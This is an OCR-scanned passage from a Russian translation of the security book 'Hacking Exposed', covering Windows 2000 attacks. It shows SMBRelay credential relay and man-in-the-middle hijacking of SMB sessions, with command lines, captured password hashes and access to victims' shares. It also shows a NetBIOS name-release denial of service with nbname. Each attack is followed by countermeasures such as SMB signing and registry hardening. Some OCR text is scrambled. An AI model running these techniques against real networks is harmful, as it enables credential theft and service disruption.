Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей - готовые решения
Подождите немного. Документ загружается.
После этого утилита SMBRelay приступит к получению входных данных, переда-
ваемых в процессе установки соединения SMB. Как только клиент успешно установит
SMB-сеанс, сервер SMBRelay предоставит следующую информацию.
Connection from
192.168.234.44:1526
Request type: Session Request 72 bytes
Source
name:
CAESARS
<00>
Target
name:
*SMBSERVER
<20>
Setting
target
name
to
source
name
and
source
name
to
'CDC4EVER'
. .
.
Response: Positive Session Response 4 bytes
Request type: Session Message 137 bytes
SMB_COM_NEGOTIATE
Response: Session Message 119 bytes
Challenge (8
bytes)
:
952B499767C1D123
Request type: Session Message 298 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case
insensitive
password:
4050C79D024AEOF391DF9A8A5BD5F3AE5E8024C5B9489BF6
Case
sensitive
password:
544FEA21F61D8E854F4C3B4ADF6FA6A5D85F9CEBAB966EEB
Username:
"Administrator"
Domain:
"CAESARS-TS"
OS: "Windows 2000 2195"
Lanman
type: "Windows 2000 5.0"
Response: Session Message 156 bytes
OS: "Windows
5.0"
Lanman type: "Windows 2000 LAN Manager"
Domain: "CAESARS-TS"
Password hash written to disk
Connected?
Relay IP address added to interface 2
Bound to port 139 on address
192.1.1.1
relaying for host CAESARS
192.168.234.44
Как видно из приведенного фрагмента, было получено оба пароля: Lan Manager
(Case
insensitive)
и
NTLM (Case
sensitive).
Перехваченные
данные
записаны
в
файл
hashes
.
txt текущего рабочего каталога. Теперь этот файл можно импортиро-
вать в утилиту
LOphtcrack
2.5x и выполнить взлом паролей.
Поскольку утилиты LOphtcrack 3 и LOphtcrack 2.52 позволяют импортировать
файлы в различном формате, то перехваченные с использованием сервера
SMBRelay
хэш-коды
паролей нельзя импортировать в LC3.
Но это еще не все! Теперь взломщик может получить доступ к клиентской маши-
не, просто соединившись с полученным адресом, которым по умолчанию является
192.1.1.1.
Вот как это выглядит.
C:\>net
use *
\\192.1
.1.
1\с$
Drive E: is now connected to
\\192
.
168
.
234
.
252\c$
The command completed
successfully.
C:\>dir
e:
Volume in drive G has no label.
Volume Serial Number is 44FO-BFDD
Глава б.
Хакинг
Windows 2000
25
1
Directory of
G:\
12/02/2000
10:51p
<DIR>
Documents
and
Settings
12/02/2000
10:08p
<DIR>
Inetpub
05/25/2001
03:47a
<DIR>
Program
Files
05/25/2001
03:47a
<DIR>
WINNT
0
File(s)
0 bytes
4 Dir(s)
44,405,624,832
bytes free
На клиентском компьютере Windows, который в предыдущем примере сам того не
подозревая подключился к серверу SMBRelay, будет наблюдаться следующее. Во-
первых, запуск стандартной команды net use приведет к генерации сообщения об
ошибке с номером 64. Кроме того, будет выдаваться сообщение о том, что подклю-
ченные сетевые диски отсутствуют. Однако при запуске команды net session можно
будет увидеть, что соединение установлено с компьютером с ложным именем
(CDC4EVER,
используемое утилитой SMBRelay
по
умолчанию,
если
оно не
было изме-
нено с помощью параметра
/S
имя).
С:\client>net
use
\\192.168.234.44\ipc$
*
/u:Adminitsrator
Type the password for
\\192.168.234.44\ipc$
System error 64 has occurred.
The
specified
network
name
is no
longer
available.
C:\client>net use
New
connections
will
not be
remembered.
There
are no
entries
in the
list.
C:\client>net
session
Computer User name Client Type
Opens
Idle
time
\\CDC4EVER
AEMDMISTRATOR
Owned
by
CDc
0
00:00:27
The
command
completed
successfully.
При использовании утилиты SMBRelay иногда возникают некоторые проблемы.
После неудачной попытки установить соединение с заданного IP-адреса узла-жертвы
все последующие попытки соединения также будут приводить к этой ошибке. (Как
указывается в файле readme, это согласуется с проектными решениями, принятыми
при разработке программы.) То же самое будет происходить даже в том случае, если
исходное соединение было успешно установлено, однако было получено сообщение,
подобное
Login
failure
code:
ОхСОООООбВ.
Все эти
проблемы позволяет
решить
перезапуск утилиты SMBRelay. (Для завершения ее работы достаточно нажать комби-
нацию клавиш <Ctrl+C>.) Кроме того, вы можете увидеть соединения с адаптером
Loopback
(169.254.9.119).
Их можно без проблем проигнорировать.
Не забывайте о том, что для перенаправления трафика на ложный SMB-сервер
можно использовать также методы перенаправления
ARP.
252 Часть II. Хакинг систем
О Контрмеры: перенаправление данных
SfViB
Теоретически, защититься от утилиты SMBRelay очень тяжело. Поскольку эта ути-
лита совместима со всеми схемами аутентификации
LM/NTLM,
то она должна пере-
хватывать любые данные, передаваемые при аутентификации.
Мощным оружием против атак MITM, реализованных на базе SMBRelay, могут
оказаться цифровые подписи (рассматриваемые ниже). Однако они вряд ли помогут в
противостоянии против серверных атак, поскольку в этом случае снижается защи-
щенность каналов обмена данными с узлами-жертвами.
^
ч
'
/
а
I
Атаки
8MB
с использованием
"третьего среднего" (MITM)
Популярность
Простота
Опасность
Степень риска
2
2
8
4
Именно для реализации атак MITM
(man-in-the-middle)
и была разработана утили-
та SMBRelay. Хотя концепцию подобных атак к этому моменту уже нельзя было на-
звать новой, она оказалась первым широко распространенным средством, позволяю-
щим в значительной мере автоматизировать весь процесс.
Пример реализации атаки с использованием "третьего среднего" на базе утилиты
SMBRelay показана на рис. 6.2. В рассматриваемом примере взломщик устанавливает
ложный сервер по адресу
192.168.234.251
(на котором запрещено использование
протокола NetBIOS поверх TCP/IP). Это реальный адрес
MITM-машины
взломщика
("третьего среднего"). Кроме того, с помощью параметра /R взломщик задает адрес
доставки
192.168.234.252,
а также адрес целевого сервера
192.168.234.34
с ис-
пользованием параметра /Т.
Клиент подключается
кМГГМ-серверу
Клиент-жертва
192.168.234.220
Сервер MITM
подключается
к серверу-жертве
"Третий средний"
192.168.234.251
Сервер-жертва
192.168.234.34
Адрес
доставки'
192.168.234.252
Взломщик подключает
диск сервера-жертвы
через адрес доставки
Взломщик
192.168.234.50
Рис.
6.2.Пример
реализации
атаки MITM с использованием утилиты SMBRelay
Глава 6. Хакинг Windows 2000
253
C:\>smbrelay
/IL
2
/IR
2 /R
192.168.234.252
/T
192.168.234.34
Bound to port
139
on address
192.168.234.251
Устанавливая соединение с ложным сервером, клиент-жертва
(192.168.234.220)
полностью уверен, что он взаимодействует с целевым сервером.
Connection from
192.168.234.220:1043
Request type: Session Request 72 bytes
Source
name:
GW2KNT4
<00>
Target
name:
*SMBSERVER
<20>
Setting
target
name
to
source
name
and
source
name
to
'CDC4EVER'...
Response: Positive Session Response 4 bytes
Request type: Session Message 174 bytes
SMB_COM_NEGOTIATE
Response: Session Message 95 bytes
Challenge
(8
bytes):
1DEDB6BF7973DD06
Security
signatures
required
by
server
***
THIS
MAY
NOT
WORK!
Disabling security signatures
Обратите внимание, что целевой сервер сконфигурирован так, чтобы требовать ус-
тановки соединений
SMB
с цифровой подписью. Однако утилита SMBRelay предпри-
нимает попытку отменить этот режим.
Request
type:
Session Message 286 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case
insensitive
password:
A4DA35F982C8E17FA2BBB952CBC01382C210FF29461A71F1
Case sensitive password:
FOC2D1CA8895BD26C7C7E8CAA54E10F1E1203DAD4782FB95
Username:
"Administrator"
Domain:
"NT4DOM"
OS:
"Windows NT 1381"
Lanman
type:
""
???:
"Windows NT
4.0"
Response: Session Message 144 bytes
OS: "Windows NT
4.0"
Lanman
type:
"NT LAN
Manager
4.0"
Domain:
"NT4DOM"
Password hash written to disk
Connected?
Relay IP address added to interface 2
Bound
to
port
139 on
address
192.168.234.252
relaying
for
host
GW2KNT4
192.168.234.220
Сейчас взломщик может успешно подключиться к потоку данных
SMB,
переда-
ваемых между клиентом и целевым сервером, и извлечь
хэш-коды
паролей
LM
и
NTLM из последовательности запросов/откликов. Подключившись к адресу доставки,
можно получить доступ к ресурсам целевого сервера. В следующем примере совмест-
ный ресурс сервера С$ подключается к узлу с адресом
192.168.234
.252.
D:\>net use *
\\192.168.234.252\с$
Drive G: is now connected to
\\gw2knt4\c$.
The command completed
successfully.
Вот как выглядит соединение, установленное с машины взломщика
(192.169.234
. 50),
на консоли сервера SMBRelay.
254 Часть II. Хакинг систем
***
Relay connection
for
target
GW2KNT4
received
from
192.168.234.50:1044
***
Sent
positive
session
response
for
relay target
GW2KNT4
***
Sent
dialect selection
response
(7) for
target
GW2KNT4
***
Sent
SMB
Session
setup
response
for
relay
to
GW2KNT4
Утилита SMBRelay может работать неустойчиво. Так что такие очевидные резуль-
таты можно получить далеко не всегда. Однако успешно реализованная подобная ата-
ка обладает поистине разрушительной силой. "Третий средний" имеет полный доступ
к ресурсам целевого сервера.
Конечно, основное препятствие заключается в том, чтобы с самого начала заста-
вить клиента выполнить аутентификацию на
MITM-сервере,
однако выше рассматри-
вались способы решения этой проблемы. Во-первых, выбранной жертве можно отпра-
вить почтовое сообщение с внедренной гиперссылкой на адрес
MITM-сервера,
на ко-
тором установлена утилита SMBRelay. Можно также реализовать перенаправление
ARP для целого сетевого сегмента, заставив входящие в него узлы выполнять аутен-
тификацию на ложном MITM-сервере. Перенаправление
ARP
более подробно рас-
сматривается в главе 10.
О Контрмеры
Наиболее очевидной контрмерой против использования утилиты SMBRelay явля-
ется настройка системы Windows 2000 таким образом, чтобы при взаимодействии кли-
ента и сервера использовались подписи SMB. Такая возможность появилась после
выпуска сервисного пакета SP3 для Windows NT4, которая более подробно описывает-
ся в статье
Q161372
базы знаний Microsoft.
При использовании подписи
SMB
каждый пакет, передаваемый при взаимодейст-
вии клиента и сервера, проверяется с помощью криптографических методов. Такой
подход теоретически способен свести на нет все попытки обмана SMB-сервера.
(Однако на практике все зависит от используемого алгоритма шифрования.) По умол-
чанию в системе Windows 2000 установлены следующие режимы.
Digitally sign client communication (when possible) Enabled
Secure channel: Digitally encrypt secure channel data (when possible) Enabled
Secure channel: Digitally sign secure channel data (when possible) Enabled
Все эти параметры можно найти среди параметров локальной политики безопасности
(Security Policy/Local Policies/Security Options). Таким образом, если клиентом поддержива-
ются подписи SMB, то система Windows 2000 будет их
использовать.
Для того чтобы
применять подписи
SMB
принудительно, дополнительно включите следующие режимы.
Digitally sign client communication (always) Enabled
Digitally sign server communication (always) Enabled
Secure channel: Digitally encrypt or sign secure channel data (always) Enabled
Secure channel: Require strong (Windows 2000 or later) session key Enabled
Помните о том, что эти параметры могут привести к невозможности взаимодействия
с системами NT 4, даже если на них тоже активизирован режим использования подпи-
сей
SMB.
Однако, как видно из приведенных выше примеров, утилита SMBRelay предпринимает
попытку обхода этого режима, так что некоторые из параметров могут и не сработать.
Поскольку при атаках на базе утилиты SMBRelay по существу
задействуются
леги-
тимные соединения, то факт их использования в журналах не зарегистрируется. При
этом на компьютере-жертве при соединении с сервером SMBRelay могут возникать
Глава 6. Хакинг Windows 2000 255
различные системные ошибки, в том числе с номером 59 (неожиданная ошибка в се-
ти). На самом деле благодаря утилите SMBRelay соединение будет установлено, одна-
ко будет использоваться ею для своих
целей.
Атаки против IIS 5
По возрастающей популярности с атаками на протоколы NetBIOS или SMB/CIFS
могут сравниться лишь многочисленные методологии атак на сервер IIS (Internet In-
formation Server), поскольку это единственная служба, обязательно присутствующая в
подключенных к Internet системах под управлением NT/2000. Эта служба встроена в
операционные системы семейства Windows 2000. По умолчанию сервер IIS 5.0 и
службы Web доступны во всех серверных версиях. И хотя вопросы, связанные с
хакингом в Web, будут более подробно рассмотрены в главе 15, мы не можем не упо-
мянуть этот важный вопрос, поскольку уязвимость Internet Information Server обеспе-
чивает прямую дорогу к остальной части операционной системы.
I Для получения более полной информации об атаках на сервер IIS и соответ-
ствующих контрмерах читайте книгу Стюарта Мак-Клара и
Джоела
Скембрея
Секреты хакеров. Безопасность Windows 2000 — готовые решения Изда-
тельского дома "Вильяме".
Удаленное переполнение буфера
В главе 5 рассматривался вопрос переполнения буфера программного интерфейса
Win32. Там же были приведены различные источники, из которых можно получить
дополнительную информацию по этой теме. Наиболее разрушительные атаки связаны
с
US-сервером
системы Windows 2000: переполнение буфера библиотеки ISAPI, ис-
пользующей протокол IPP (MS01-023), средство взлома DLL-библиотеки индексного
сервера ISAPI (MS01-033), атаки на подкомпоненты серверных расширений Front
Page
(MS01-035).
Все эти атаки более подробно описываются в главе 15.
Отказ в обслуживании
Если большинство серьезных атак против операционной системы NT, направлен-
ных на генерацию состояния DoS (отказ в обслуживании), предотвращается с помо-
щью сервисного пакета NT 4 Service Pack 6а, то Windows 2000 является сравнительно
надежной в этом отношении операционной системой. Однако следует заметить, что
об абсолютной защищенности говорить не приходится. Обсуждение атак DoS на сис-
тему Windows 2000 разделено на два этапа. Сначала будут рассмотрены атаки, связан-
ные с протоколом TCP/IP, а затем — с NetBIOS.
• Атаки DoS на стек протоколов TCP/IP Windows 2000
Internet подтверждает известную истину: жизнь — это игра без правил. Особенно
наглядно это проявилось в эксперименте с
Win2000test.com,
когда, согласно прави-
лам, атаки DoS были категорически запрещены. Тем не менее, серверы этого узла
подверглись массированной бомбардировке IP-пакетами, количество которых значи-
тельно превысило возможности серверов по их обработке, а также хорошо известным
атакам SYN, приводящим к переполнению очередей в стеке протокола TCP/IP (более
подробная информация о специфике этих атак содержится в главе 12).
256 Часть II. Хакинг систем
О Контрмеры
Чтобы минимизировать ущерб от подобных атак, необходимо соответствующим
образом настроить сетевые шлюзы или брандмауэры (более подробная информация
содержится в главе 12). Однако еще раз повторим, что целесообразно также противо-
стоять таким атакам на уровне отдельных компьютеров. Это сыграет свою роль, если
одна из линий обороны будет прорвана.
Благодаря эксперименту с узлом
Win2000test.com,
компания Microsoft смогла добавить
в операционную систему Windows 2000 несколько новых ключей системного реестра, кото-
рые можно использовать для защиты стека TCP/IP от атак DoS. В табл. 6.3 содержится ин-
формация о конфигурации параметров системного реестра на серверах
Win2000test.com
(эта таблица создана на основе отчета компании Microsoft, посвященного результатам экспе-
римента
и
расположенного
по
адресу
http:
//www.microsoft.com/security,
а
также лич-
ного общения авторов с группой разработчиков
Win2000test.
com).
| Некоторые из приведенных в табл. 6.3 значений, например
SynAttackProtect=2,
иногда могут оказаться слишком жесткими. Они были
выбраны для защиты сервера Internet с активным трафиком.
Таблица 6.3, Рекомендуемые параметры для стека TCP/IP в операционной
v;
•
системе NT/2000, позволяющие предотвратить атаки DoS
Параметр в разделе
HKLM\Sys\CCS\Services
Рекомендуемое
значение
Описание
Tcpip\Parameters\
SynAttackProtect
Tcpip\Parameters\
EnableDeadGWDetect
Этот параметр позволяет настраивать процесс пе-
редачи подтверждений SYN-ACK и обеспечивает
более быстрый переход в режим ожидания при вы-
явлении атаки SYN. Выявление этой атаки базиру-
ется на текущих значениях параметров
TcpMaxPortsExhausted,
TCPMaxHalfOpen И
TCPMaxHalf
OpenRetried.
Значение
2
обес-
печивает наилучшую защиту от
SYN-атак,
но может
привести к проблемам с соединениями, характери-
зующимися высокой задержкой. Кроме того, если
этот параметр принимает значение 2, то не учиты-
ваются следующие опции сокетов: переменный
размер окна (RFC 1323) и настройка параметров
TCP для каждого адаптера (размер окна)
Если этот параметр принимает значение
1,
то
протокол TCP может выявлять неактивные шлю-
зы и в случае трудностей с несколькими соеди-
нениями переключаться на резервный шлюз.
Резервные шлюзы можно определить, щелкнув
на кнопке Advanced диалогового окна свойств
протокола TCP/IP аплета Network панели
управления. Если этот параметр принимает зна-
чение 0, то взломщик не может спровоцировать
переключение на менее желательные шлюзы
Глава 6. Хакинг Windows 2000
257
Окончание
табл.
6,3
Параметр в разделе
HKLM\Sys\CCS\Services
Рекомендуемое Описание
значение
Tcpip\Parameters\
ЕпаЫ
е
PMTUD
i
s
с
overy
Tcpip\Parameters\Keep
AliveTime
300000
(5 минут)
Tcpip\Parameters\Inte
rf
aces
\<ингерфеЙОМоЫат
eReleaseOnDemand
0 (false)
Tcpip\Parameters\Inte
г£асез\<ИНгерфеЙС>Рег£о
rmRouterDiscovery
Если этот параметр принимает значение 1 (true),
то протокол TCP пытается определить макси-
мальную единицу передачи MTU (Maximum
Transmission Unit) для каждого соединения с
удаленным узлом. Определив значение
MTU
и
ограничив этим значением размер сегментов
TCP, можно устранить фрагментацию на
маршрутизаторах, соединяющих сети с различ-
ными значениями MTU вдоль пути следования
пакетов. Фрагментация может приводить к
пробкам в сети. Если этот параметр принимает
значение 0, то значение
MTU
принимается рав-
ным 576 байт для всех соединений, иницииро-
ванных извне локальной подсети. Это препятст-
вует попыткам хакеров изменить значение
MTU
на меньшее с целью переполнения стека
Этот параметр отвечает за частоту отправки
контрольных пакетов (keep-alive), проверяющих,
не разорвано ли соединение, находящееся в
режиме ожидания. Если удаленная система все
еще достижима и функционирует в нормальном
режиме, то она направляет подтверждение. Кон-
трольные пакеты по умолчанию не отправляют-
ся. Это свойство можно включить для данного
соединения с помощью соответствующего при-
ложения. Данные параметры являются глобаль-
ными, т.е. применяются для всех интерфейсов.
Их значения могут оказаться слишком малыми
для адаптеров, используемых в целях управле-
ния или резервирования
Этот параметр определяет, следует ли компью-
теру возвращать свое имя NetBIOS в ответ на
запрос Name-Release из сети. Значение О
предотвращает атаки, направленные на получе-
ние имени NetBIOS (см. бюллетень Microsoft Se-
curity
Bulletin
MSOO-047).
До конца не ясно, к ка-
кому результату могут привести подобные атаки
при отключении протоколов
NetBIOS/SMB/CIFS,
как описано выше в этой главе
От значения этого параметра зависит, будет ли
Windows NT/2000 выполнять поиск
маршрутизатора, согласно спецификации
RFC
1256
для каждого интерфейса в отдельно-
сти. Значение 0 предотвращает попытки атак с
использованием ложных пакетов от ложных
маршрутизаторов. Для определения, какой ин-
терфейс соответствует сетевому адаптеру, мож-
но использовать значение параметра
TcpipVParameters\Adapters
258
Часть II.
Хакинг
систем
Более подробная информация об этих параметрах и описание параметра
synAttack
Protect содержится в статье
Q142641
базы знаний компании Microsoft.
.£,-.'•
9 Генерация состояния DoS на сервере имен NetBIOS
В июле 2000 года сэр Дастик из группы хакеров Cult of the Dead Cow ("Культ
мертвой коровы",
http://www.cultdeadcow.com)
сообщил о том, что отправка со-
общения "NetBIOS Name Release" службе имен NetBIOS (NBNS, UDP 137) компью-
тера NT/2000 приводит к конфликту, связанному с этим именем, и невозможности
его
дальнейшего использования. После получения такого сообщения это имя нельзя
использовать в сети NetBIOS.
Примерно в это же время из лаборатории Network Associates COVERT Labs
(http://www.nai.com)
сообщили, что сообщение "NetBIOS Name Conflict" можно
отправить службе имен NetBIOS даже в том случае, если целевой компьютер не нахо-
дится в процессе регистрации своего имени NetBIOS. Это тоже приводит к конфликту
и невозможности дальнейшего использования имени.
Сэр Дастик написал программу взлома под названием nbname, с помощью которой
можно отправить пакет "NBNS Name Release" всем компьютерам, зарегистрирован-
ным в таблице имен NetBIOS, и тоже вызвать аналогичную проблему. Ниже приво-
дится пример того, как воспользоваться программой nbname для создания состояния
DoS отдельного узла. В системе Windows 2000 сначала нужно отключить режим ис-
пользования протокола NetBIOS поверх TCP/IP. Это позволит предотвратить кон-
фликты со службой NBNS, которая обычно использует порт UDP 137. После этого
можно воспользоваться утилитой nbname, как показано ниже. (Адрес 192
.168
. 234 . 222
замените адресом требуемого узла.)
C:\nbname
/astat
192.168.234.222
/conflict
NBName
v2.51
-
Decodes
and
displays
NetBIOS
Name
traffic
(UDP
137),
with
options
Copyright 2000: Sir Dystic, Cult of the Dead Caw
-:|:-
New Hack City
Send complaints, ideas and donations to
sd@cultdeadcow.com!sd@newhackcity.net
WinSock
v2.0
(v2.2)
WinSock
2.0
WinSock
status:
Running
Bound to port 137 on address
192.168.234.244
Broadcast address:
192.168.234.255
Netmask:
255.255.255.0
****
NBSTAT
QUERY
packet
sent
to
192.168.234.222
Waiting for
packets...
**
Received 301 bytes from
192.168.234.222:137
via local net at Wed Jun 20 15:46:12 2000
OPCode:
QUERY
Flags: Response AuthoratativeAnswer
Answer[0]:
* <00>
Node Status Resource Record:
MANDALAY
<00>ACTIVE
UNIQUE NOTPERM
INCONFLICT
NOTDEREGED B-NODE
MANDALAY FS <00>ACTIVE GROUP NOTPERM NOCONFLICT
NOTDEREGED B-NODE
****
Name release sent to
192.168.234.222
[и
т.д.]
Глава 6. Хакинг Windows 2000 259
Параметр
/astat
позволяет получить статус удаленного адаптера
узла-жертвы,
а
ключ
/conflict
обеспечивает возможность передачи пакетов "Name Release" узлам с
именами, обнаруженными в удаленной таблице имен, которые откликнулись на за-
прос о статусе адаптера. Сгенерировать условие DoS для всей сети можно с помощью
параметров/QUERY
[IP-адрес]
/conflict
/DENY
[имя-или-файл].
При этом на атакуемом узле можно обнаружить следующие симптомы.
Т Возникновение неустойчивых сетевых соединений.
• Отказ в работе некоторых компонентов, например Network Neighborhood.
• Невозможность использования команды net send.
• Атакуемый сервер не выполняет доменной аутентификации.
• Недоступность совместно используемых ресурсов и основных служб NetBIOS,
применяемых, например, для разрешения имен NetBIOS.
А При
запуске команды
nbtstat
-n для
службы имен NetBIOS можно получить
сообщение о статусе
Conflict,
как показано ниже.
C:\nbtstat
-п
Local Area Connection:
Node IpAddress:
[192.168.234.222]
Scope Id: []
NetBIOS Local Name Table
Name Type Status
MANDALAY
<00> UNIQUE Conflict
MANDALAYFS
<00> GROUP Registered
MANDALAYFS <1C> GROUP Registered
MANDALAY <20> UNIQUE Conflict
MANDALAYFS <1E> GROUP Registered
MANDALAYFS <1D> UNIQUE Conflict
..
MSBROWSE
. <01> GROUP Registered
MANDALAYFS <1B> UNIQUE Conflict
INet-Services
<1C> GROUP Registered
IS-MANDALAY
<00> UNIQUE Conflict
О Контрмеры: атака DoS на сервер имен NetBIOS
Ответственность за предлагаемое решение целиком ложится на плечи компании
IBM, поскольку именно она является разработчиком NetBIOS. К сожалению, протокол
NetBIOS не стандартизован, поэтому авторы не могут гарантировать надежность сле-
дующего рецепта. Компания Microsoft разработала ключ системного реестра, предот-
вращающего подтверждение сообщения "Name Release" со стороны сервера
NBNS.
Решение проблемы с сообщением "Name Conflict" состоит в том, что это сообщение
обрабатывается только на этапе регистрации. Таким образом, компьютер остается уяз-
вимым только в это время. Соответствующий модуль обновления и более подробная
информация содержится по адресу
http://www.microsoft.com/technet/security/
bulletin/MSOO-047
.asp.
Этот модуль обновления не вошел в SP1 и может применять-
ся как до, так и после установки сервисного пакета.
Более надежное решение, конечно, состоит в отказе от использования службы
NetBIOS и, как следствие, полном предотвращении подобного хулиганства. Кроме
того, безусловно, необходимо отключить UDP-порт
137
для доступа извне.
260 Часть II. Хакинг систем